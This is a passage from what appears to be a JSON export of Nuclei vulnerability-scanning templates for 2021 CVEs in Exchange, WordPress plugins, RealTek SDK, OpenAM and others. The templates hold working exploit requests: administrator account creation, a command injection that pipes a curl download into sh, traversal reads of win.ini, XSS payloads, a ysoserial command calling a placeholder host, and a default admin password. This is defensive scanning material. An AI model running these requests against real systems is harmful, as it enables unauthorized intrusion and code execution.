4a0a00473045022100bd58c1d099476379c284c800fdff4ff7fb04548ad586e31004eb4f4572dad96b02205e568d1598ba3e2de032422dcb82f910c03c98ec68ccee39ac684be4f30c6fd5:922c64590222798bb761d5b6d8e72950", "hash": "5df30ee071f5b0bc015a673892e74f78", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30836f" }, "name": "CVE-2021-34473.yaml", "content": "id: CVE-2021-34473\n\ninfo:\n name: Exchange Server - Remote Code Execution\n author: arcc,intx0x80,dwisiswant0,r3dg33k\n severity: critical\n description: |\n Microsoft Exchange Server is vulnerable to a remote code execution vulnerability. This CVE ID is unique from CVE-2021-31196, CVE-2021-31206.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected Exchange Server, potentially leading to a complete compromise of the system.\n remediation: Apply Microsoft Exchange Server 2019 Cumulative Update 9 or upgrade to the latest version.\n reference:\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473\n - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html\n - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1\n - https://nvd.nist.gov/vuln/detail/CVE-2021-34473\n - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34473\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n cvss-score: 9.1\n cve-id: CVE-2021-34473\n cwe-id: CWE-918\n epss-score: 0.97285\n epss-percentile: 0.99848\n cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: microsoft\n product: exchange_server\n tags: cve2021,cve,ssrf,rce,exchange,kev,microsoft\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com'\n - '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com'\n\n matchers:\n - type: word\n part: body\n words:\n - \"Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException\"\n - \"Exchange MAPI/HTTP Connectivity Endpoint\"\n condition: or\n# digest: 4a0a0047304502201b1af120ec090b8ce24a896b622e97f0cac87382b79a5e59e1e9d581099e6d7a022100c51af8c078f10d5837821287b2fcc3f013e3cd4f684ce1b3c9009a552bb36138:922c64590222798bb761d5b6d8e72950", "hash": "f06136a1112dff06a797e20baf7a6faf", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308370" }, "name": "CVE-2021-34621.yaml", "content": "id: CVE-2021-34621\n\ninfo:\n name: WordPress ProfilePress 3.0.0-3.1.3 - Admin User Creation Weakness\n author: 0xsapra\n severity: critical\n description: ProfilePress WordPress plugin is susceptible to a vulnerability in the user registration component in the ~/src/Classes/RegistrationAuth.php file that makes it possible for users to register on sites as an administrator.\n impact: |\n An attacker can exploit this vulnerability to create unauthorized admin accounts and gain full control over the WordPress site.\n remediation: |\n Update to the latest version of ProfilePress to fix the admin user creation weakness.\n reference:\n - https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin\n - https://nvd.nist.gov/vuln/detail/CVE-2021-34621\n - https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin/\n - http://packetstormsecurity.com/files/163973/WordPress-ProfilePress-3.1.3-Privilege-Escalation.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-34621\n cwe-id: CWE-306,CWE-269\n epss-score: 0.7888\n epss-percentile: 0.97984\n cpe: cpe:2.3:a:properfraction:profilepress:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 3\n vendor: properfraction\n product: profilepress\n framework: wordpress\n tags: cve2021,cve,wordpress,wp-plugin,packetstorm,intrusive,properfraction\n\nhttp:\n - raw:\n - |\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Accept: application/json, text/javascript, */*; q=0.01\n Content-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589\n Origin: {{BaseURL}}\n Referer: {{BaseURL}}\n\n -----------------------------138742543134772812001999326589\n Content-Disposition: form-data; name=\"reg_username\"\n\n {{randstr}}\n -----------------------------138742543134772812001999326589\n Content-Disposition: form-data; name=\"reg_email\"\n\n {{randstr}}@interact.sh\n -----------------------------138742543134772812001999326589\n Content-Disposition: form-data; name=\"reg_password\"\n\n {{randstr}}@interact.sh\n -----------------------------138742543134772812001999326589\n Content-Disposition: form-data; name=\"reg_password_present\"\n\n true\n -----------------------------138742543134772812001999326589\n Content-Disposition: form-data; name=\"reg_first_name\"\n\n {{randstr}}@interact.sh\n -----------------------------138742543134772812001999326589\n Content-Disposition: form-data; name=\"reg_last_name\"\n\n {{randstr}}@interact.sh\n -----------------------------138742543134772812001999326589\n Content-Disposition: form-data; name=\"_wp_http_referer\"\n\n /wp/?page_id=18\n -----------------------------138742543134772812001999326589\n Content-Disposition: form-data; name=\"pp_current_url\"\n\n {{BaseURL}}\n -----------------------------138742543134772812001999326589\n Content-Disposition: form-data; name=\"wp_capabilities[administrator]\"\n\n 1\n -----------------------------138742543134772812001999326589\n Content-Disposition: form-data; name=\"signup_form_id\"\n\n 1\n -----------------------------138742543134772812001999326589\n Content-Disposition: form-data; name=\"signup_referrer_page\"\n\n\n -----------------------------138742543134772812001999326589\n Content-Disposition: form-data; name=\"action\"\n\n pp_ajax_signup\n -----------------------------138742543134772812001999326589\n Content-Disposition: form-data; name=\"melange_id\"\n\n\n -----------------------------138742543134772812001999326589--\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Accept: application/json, text/javascript, */*; q=0.01\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n Origin: {{BaseURL}}\n Referer: {{BaseURL}}\n\n log={{randstr}}@interact.sh&pwd={{randstr}}@interact.sh&wp-submit=Log+In\n - |\n GET /wp-admin/ HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Connection: close\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - Welcome to your WordPress Dashboard\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ada3493f206abd735b16deb87788c4c837ad79b21b18a91eb6c5271f9b2e87620220553d246455cb93e3e3c8c33a06b8ba3a6fdb714db165681c77ed54d827d2aa7f:922c64590222798bb761d5b6d8e72950", "hash": "ab6b2ccfc1eb5f356949906558cf531f", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308371" }, "name": "CVE-2021-34640.yaml", "content": "id: CVE-2021-34640\n\ninfo:\n name: WordPress Securimage-WP-Fixed <=3.5.4 - Cross-Site Scripting\n author: dhiyaneshDK\n severity: medium\n description: WordPress Securimage-WP-Fixed plugin 3.5.4 and prior contains a cross-site scripting vulnerability due to the use of $_SERVER['PHP_SELF'] in the ~/securimage-wp.php file, which allows attackers to inject arbitrary web scripts.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update the Securimage-WP-Fixed plugin to version 3.5.4 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/22017067-8675-4884-b976-d7f5a71279d2\n - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-34640\n - https://plugins.trac.wordpress.org/browser/securimage-wp-fixed/trunk/securimage-wp.php#L628\n - https://nvd.nist.gov/vuln/detail/CVE-2021-34640\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-34640\n cwe-id: CWE-79\n epss-score: 0.00116\n epss-percentile: 0.45185\n cpe: cpe:2.3:a:securimage-wp-fixed_project:securimage-wp-fixed:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: securimage-wp-fixed_project\n product: securimage-wp-fixed\n framework: wordpress\n tags: cve2021,cve,wpscan,wordpress,wp-plugin,authenticated,securimage-wp-fixed_project\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET //wp-admin/options-general.php/\">/script%3E?page=securimage-wp-options%2F HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100f71f4027e35181f2336f1a5f0c7fa04fd40c25ca4ea1749124253649571d1d09022100a95ccf3acc3d6ad779d55f0e9ae4ce0735927cbfd3a5aa7f9b2350c68169ee4d:922c64590222798bb761d5b6d8e72950", "hash": "8d13bff3277660d4fea0360291ae2486", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308372" }, "name": "CVE-2021-34643.yaml", "content": "id: CVE-2021-34643\n\ninfo:\n name: WordPress Skaut Bazar <1.3.3 - Cross-Site Scripting\n author: dhiyaneshDK\n severity: medium\n description: WordPress Skaut Bazar plugin before 1.3.3 contains a reflected cross-site scripting vulnerability due to the use of $_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file, which allows attackers to inject arbitrary web scripts.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.\n remediation: |\n Update to the latest version of WordPress Skaut Bazar plugin (1.3.3) or apply the vendor-provided patch to fix the XSS vulnerability.\n reference:\n - https://wpscan.com/vulnerability/c1b41276-b8fb-4a5c-bede-84ea62663b7a\n - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-34643\n - https://plugins.trac.wordpress.org/browser/skaut-bazar/tags/1.3.2/skaut-bazar.php#L657\n - https://nvd.nist.gov/vuln/detail/CVE-2021-34643\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-34643\n cwe-id: CWE-79\n epss-score: 0.00116\n epss-percentile: 0.44405\n cpe: cpe:2.3:a:skaut-bazar_project:skaut-bazar:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: skaut-bazar_project\n product: skaut-bazar\n framework: wordpress\n tags: cve2021,cve,wpscan,wordpress,wp-plugin,authenticated,skaut-bazar_project,xss\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/options-general.php//?page=skatubazar_option HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206d3a11c0c355a2d754828a3bf9cb67c195bd89e335c164e6c70ff16f69226d9202202f501c665407d0e31660af7d953a8a91410f52a5b28a21f28bf895b7b18f7977:922c64590222798bb761d5b6d8e72950", "hash": "ce1c752ce2f99153251543f7b20a7141", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308373" }, "name": "CVE-2021-34805.yaml", "content": "id: CVE-2021-34805\n\ninfo:\n name: FAUST iServer 9.0.018.018.4 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: FAUST iServer before 9.0.019.019.7 is susceptible to local file inclusion because for each URL request it accesses the corresponding .fau file on the operating system without preventing %2e%2e%5c directory traversal.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server.\n remediation: |\n Apply the latest security patch or update to a non-vulnerable version of FAUST iServer.\n reference:\n - https://cxsecurity.com/issue/WLB-2022010120\n - http://packetstormsecurity.com/files/165701/FAUST-iServer-9.0.018.018.4-Local-File-Inclusion.html\n - http://www.land-software.de/lfs.fau?prj=iweb&dn=faust+iserver\n - https://nvd.nist.gov/vuln/detail/CVE-2021-34805\n - https://github.com/20142995/Goby\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-34805\n cwe-id: CWE-22\n epss-score: 0.17035\n epss-percentile: 0.95944\n cpe: cpe:2.3:a:land-software:faust_iserver:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: land-software\n product: faust_iserver\n tags: cve2021,cve,lfi,packetstorm,faust,iserver,land-software\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220483d18d13b339bce1072f55780e09412873fbc11be357967dfd8c3168bda3bc80221009cd68fbbedfa7f4c6bfe9543021f624b8a94c3ed938791eb9f7c7ffb2daebb88:922c64590222798bb761d5b6d8e72950", "hash": "b3400256e25a32f1341d3a199f03e0c5", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308374" }, "name": "CVE-2021-35250.yaml", "content": "id: CVE-2021-35250\n\ninfo:\n name: SolarWinds Serv-U 15.3 - Directory Traversal\n author: johnk3r,pdteam\n severity: high\n description: |\n SolarWinds Serv-U 15.3 is susceptible to local file inclusion, which may allow an attacker access to installation and server files and also make it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further attacks.\n remediation: Resolved in Serv-U 15.3 Hotfix 1.\n reference:\n - https://github.com/rissor41/SolarWinds-CVE-2021-35250\n - https://support.solarwinds.com/SuccessCenter/s/article/Serv-U-15-3-HotFix-1?language=en_US\n - https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35250\n - https://twitter.com/shaybt12/status/1646966578695622662?s=43&t=5HOgSFut7Y75N7CBHEikSg\n - https://nvd.nist.gov/vuln/detail/CVE-2021-35250\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-35250\n cwe-id: CWE-22\n epss-score: 0.05835\n epss-percentile: 0.93245\n cpe: cpe:2.3:a:solarwinds:serv-u:15.3:-:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: solarwinds\n product: serv-u\n shodan-query: product:\"Rhinosoft Serv-U httpd\"\n tags: cve2021,cve,solarwinds,traversal\n\nhttp:\n - raw:\n - |\n POST /?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n /?Command=NOOP\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"\\\\[(font|extension|file)s\\\\]\"\n\n - type: status\n status:\n - 401\n# digest: 490a0046304402200620000d186c36d678271b33d3f8ab02fa3ece06cd95c0344ba841a95c9659f802201309537d97e91561f1fd81ac4850c36eca8c4bf67806545f58635619957ea31a:922c64590222798bb761d5b6d8e72950", "hash": "868fa8c4e63e5a99e360bd360e43bd5d", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308375" }, "name": "CVE-2021-35265.yaml", "content": "id: CVE-2021-35265\n\ninfo:\n name: MaxSite CMS > V106 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: |\n A reflected cross-site scripting vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page.\"\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of MaxSite CMS or apply the vendor-provided security patch to mitigate the XSS vulnerability (CVE-2021-35265).\n reference:\n - https://github.com/maxsite/cms/issues/414#issue-726249183\n - https://nvd.nist.gov/vuln/detail/CVE-2021-35265\n - https://github.com/maxsite/cms/commit/6b0ab1de9f3d471485d1347e800a9ce43fedbf1a\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-35265\n cwe-id: CWE-79\n epss-score: 0.00133\n epss-percentile: 0.47461\n cpe: cpe:2.3:a:maxsite:maxsite_cms:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: maxsite\n product: maxsite_cms\n shodan-query: html:'content=\"MaxSite CMS'\n tags: cve2021,cve,maxsite,xss\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E'\n - '{{BaseURL}}/page/1%22%3E%3Csvg/onload=alert(document.domain)%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '>'\n\n - type: word\n part: body\n words:\n - 'mso-comments-rss\">RSS'\n - 'MaxSite CMS'\n - 'feed\">RSS'\n condition: or\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e9c214b01c6e7d86492788140807064441cd148338038cbab30021c0d8492ef202202fee55bfa22008c45b8096aedbcbb99a19021b8b9794c77311b87645ff04cca1:922c64590222798bb761d5b6d8e72950", "hash": "bf7e9f6c49ce79a0e2795a74e4e643ef", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308376" }, "name": "CVE-2021-35323.yaml", "content": "id: CVE-2021-35323\n\ninfo:\n name: Bludit 3.13.1 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Cross Site Scripting (XSS) vulnerability exists in bludit 3-13-1 via the username in admin/login\n remediation: Bludit v4.0.0\n reference:\n - https://github.com/bludit/bludit/issues/1327\n - https://nvd.nist.gov/vuln/detail/CVE-2021-35323\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-35323\n cwe-id: CWE-79\n epss-score: 0.00183\n epss-percentile: 0.55601\n cpe: cpe:2.3:a:bludit:bludit:3.13.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: bludit\n product: bludit\n shodan-query: title:\"Bludit\"\n tags: cve2021,cve,bludit,xss\n\nhttp:\n - raw:\n - |\n GET /bludit/admin/login HTTP/1.1\n Host: {{Hostname}}\n - |\n @timeout: 10s\n POST /bludit/admin/login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n tokenCSRF={{tokenCSRF}}&username=admin%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&password=pass&save=\n\n host-redirects: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"\") && contains(body_2, \"Bludit\")'\n condition: and\n\n extractors:\n - type: regex\n name: tokenCSRF\n part: body\n group: 1\n regex:\n - 'type=\"hidden\" id=\"jstokenCSRF\" name=\"tokenCSRF\" value=\"(.*)\"'\n internal: true\n# digest: 4a0a00473045022032cea10cfe2c27c8f06a3a4d1af7a5f3386caf73473c6483fd0df3b4bea40945022100919da458a0416cd6205d3f542c2f118ce6764e45d01de619621fb1db132866e6:922c64590222798bb761d5b6d8e72950", "hash": "c9da3bfd648d3b8d48fe94ced64d19aa", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308377" }, "name": "CVE-2021-35336.yaml", "content": "id: CVE-2021-35336\n\ninfo:\n name: Tieline IP Audio Gateway <=2.6.4.8 - Unauthorized Remote Admin Panel Access\n author: Pratik Khalane\n severity: critical\n description: Tieline IP Audio Gateway 2.6.4.8 and below is affected by a vulnerability in the web administrative interface that could allow an unauthenticated user to access a sensitive part of the system with a high privileged account.\n impact: |\n An attacker can gain unauthorized access to the admin panel, potentially leading to unauthorized control and manipulation of the audio gateway.\n remediation: |\n Upgrade to a patched version of Tieline IP Audio Gateway that fixes the vulnerability.\n reference:\n - https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c\n - https://nvd.nist.gov/vuln/detail/CVE-2021-35336\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-35336\n cwe-id: CWE-1188\n epss-score: 0.0793\n epss-percentile: 0.94105\n cpe: cpe:2.3:o:tieline:ip_audtio_gateway_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: tieline\n product: ip_audtio_gateway_firmware\n tags: cve2021,cve,tieline,default-login\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/api/get_device_details'\n\n headers:\n Authorization: 'Digest username=\"admin\", realm=\"Bridge-IT\", nonce=\"d24d09512ebc3e43c4f6faf34fdb8c76\", uri=\"/api/get_device_details\", response=\"d052e9299debc7bd9cb8adef0a83fed4\", qop=auth, nc=00000001, cnonce=\"ae373d748855243d\"'\n Referer: '{{BaseURL}}/assets/base/home.html'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"\"\n - \"\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/xml\"\n\n - type: status\n status:\n - 200\n\n# admin:password\n# digest: 4a0a00473045022100c5971cc683938cd5ccc1d2b6f56c1c2e6b4be1423d7d682586326e7ced627fb002201cbaba9a7838eab21d7dae0dbe8582f084e0fad966c90ec30731787e015a7abd:922c64590222798bb761d5b6d8e72950", "hash": "1e78884fabb9c861c90fe4169e7fe2fd", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308378" }, "name": "CVE-2021-35380.yaml", "content": "id: CVE-2021-35380\n\ninfo:\n name: TermTalk Server 3.24.0.2 - Local File Inclusion\n author: fxploit\n severity: high\n description: |\n TermTalk Server (TTServer) 3.24.0.2 is vulnerable to file inclusion which allows unauthenticated malicious user to gain access to the files on the remote system by providing the relative path of the file they want to retrieve.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data.\n remediation: |\n Apply the latest patch or upgrade to a non-vulnerable version of TermTalk Server.\n reference:\n - https://www.swascan.com/solari-di-udine/\n - https://www.exploit-db.com/exploits/50638\n - https://nvd.nist.gov/vuln/detail/CVE-2021-35380\n - https://www.swascan.com/it/security-blog/\n - https://github.com/anonymous364872/Rapier_Tool\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-35380\n cwe-id: CWE-22\n epss-score: 0.23467\n epss-percentile: 0.96147\n cpe: cpe:2.3:a:solari:termtalk_server:3.24.0.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: solari\n product: termtalk_server\n tags: cve2021,cve,termtalk,lfi,unauth,lfr,edb,solari\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/file?valore=../../../../../windows/win.ini\"\n\n matchers:\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n# digest: 490a0046304402201049687d7055f539322e4410a7114608b1866683ac30c589fc9f8b1207b39bac022031fcf5d29996d0c09d94724b89f5f871ca1112d0c801d367951c80f2f395de11:922c64590222798bb761d5b6d8e72950", "hash": "c5d9e507c3f9390d990ca2ee74dfcc90", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308379" }, "name": "CVE-2021-35395.yaml", "content": "id: CVE-2021-35395\n\ninfo:\n name: RealTek Jungle SDK - Arbitrary Command Injection\n author: king-alexander\n severity: critical\n description: |\n There is a command injection vulnerability on the \"formWsc\" page of the management interface. Successful exploitation of this vulnerability could lead to remote code execution and compromise of the affected system.\n remediation: Apply the latest security patches or updates provided by RealTek to fix the vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2021-35395\n - https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities\n - https://www.realtek.com/en/cu-1-en/cu-1-taiwan-en\n - https://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdf\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-35395\n epss-score: 0.97119\n epss-percentile: 0.99744\n cpe: cpe:2.3:a:realtek:realtek_jungle_sdk:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: realtek\n product: realtek_jungle_sdk\n tags: cve2021,cve,realtek,rce,kev\n\nhttp:\n - raw:\n - |\n POST /goform/formWsc HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: curl\"\n# digest: 4a0a0047304502200f282350954f899ddbf62874c49a1c8297dfe332dae61b46c09d5fce43904bf4022100861f33e914b3543cccbec18fe3c283f7a6a028d5f52c9691c9f397c000c41ddd:922c64590222798bb761d5b6d8e72950", "hash": "72517733aeb9a0235c4477e14d27a703", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30837a" }, "name": "CVE-2021-35464.yaml", "content": "id: CVE-2021-35464\n\ninfo:\n name: ForgeRock OpenAM <7.0 - Remote Code Execution\n author: madrobot\n severity: critical\n description: |\n ForgeRock AM server before 7.0 has a Java deserialization vulnerability in the jato.pageSession parameter on multiple pages.\n The exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted\n /ccversion/* request to the server. The vulnerability exists due to the usage of Sun ONE Application Framework (JATO)\n found in versions of Java 8 or earlier.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade ForgeRock OpenAM to version 7.0 or later to mitigate this vulnerability.\n reference:\n - https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35464\n - http://packetstormsecurity.com/files/163486/ForgeRock-OpenAM-Jato-Java-Deserialization.html\n - http://packetstormsecurity.com/files/163525/ForgeRock-Access-Manager-OpenAM-14.6.3-Remote-Code-Execution.html\n - https://bugster.forgerock.org\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-35464\n cwe-id: CWE-502\n epss-score: 0.97262\n epss-percentile: 0.99826\n cpe: cpe:2.3:a:forgerock:am:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: forgerock\n product: am\n shodan-query: http.title:\"OpenAM\"\n tags: cve,cve2021,packetstorm,openam,rce,java,kev,forgerock\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/openam/oauth2/..;/ccversion/Version'\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"Set-Cookie: JSESSIONID=\"\n\n - type: word\n part: body\n words:\n - \"Version Information -\"\n - \"openam/ccversion/Masthead.jsp\"\n condition: or\n\n - type: status\n status:\n - 200\n\n# {{BaseURL}}/openam/oauth2/..;/ccversion/Version?jato.pageSession=\n# java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Click1 \"curl http://YOUR_HOST\" | (echo -ne \\\\x00 && cat) | base64 | tr '/+' '_-' | tr -d '='\n# digest: 4b0a0048304602210096ad692f00dcbf4f3af20af5a64849212f0d34f86c39fc4fb44827b84f7c71e1022100c49ca89081587287319c33037d60f573edf039decc7db504ba8c4f8be2da69e0:922c64590222798bb761d5b6d8e72950", "hash": "f2aa91cec25fdb7e674823d715cc380e", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30837b" }, "name": "CVE-2021-35488.yaml", "content": "id: CVE-2021-35488\n\ninfo:\n name: Thruk 2.40-2 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n Thruk 2.40-2 contains a cross-site scripting vulnerability via /thruk/#cgi-bin/status.cgi?style=combined&title={TITLE] in the host or title parameter. An 